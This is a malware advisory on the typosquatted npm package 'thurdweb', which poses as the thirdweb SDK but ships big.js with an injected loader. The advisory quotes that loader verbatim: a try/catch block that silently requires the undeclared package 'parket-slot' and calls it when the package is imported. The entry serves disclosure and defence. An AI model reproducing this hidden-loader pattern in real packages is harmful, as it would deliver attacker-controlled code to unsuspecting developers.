OSV ID
MAL-2026-6345
Ecosystem
npm
Summary
Package name thurdweb is a one-character substitution of the popular web3 SDK thirdweb , but the shipped source is a copy of MikeMcl/big.js (arbitrary-precision decimal arithmetic) — the public API has no relation to the impersonated target. The library file ( big.js / big.mjs lines 605-608) contains an injected top-level block that fires on require('thurdweb') / import 'thurdweb' : try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } . parket-slot is not declared in package.json dependencies , and the entire call is wrapped in an empty try/catch that silently swallows every error. package.json additionally declares log-taker@^0.0.9 as a runtime dependency, which is unrelated to decimal arithmetic and shares the same nondescriptive shape. Any installer who imports this package transitively loads attacker-controlled code from sibling packages whose contents the publisher controls and can mutate independently of this tarball; the silent error handler hides failure from the consumer.
Source: amazon-inspector (775ff15f4a1314978d4cfed1e97c6c9ac8621d8ddeed93160c25aa3681f73cc7)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.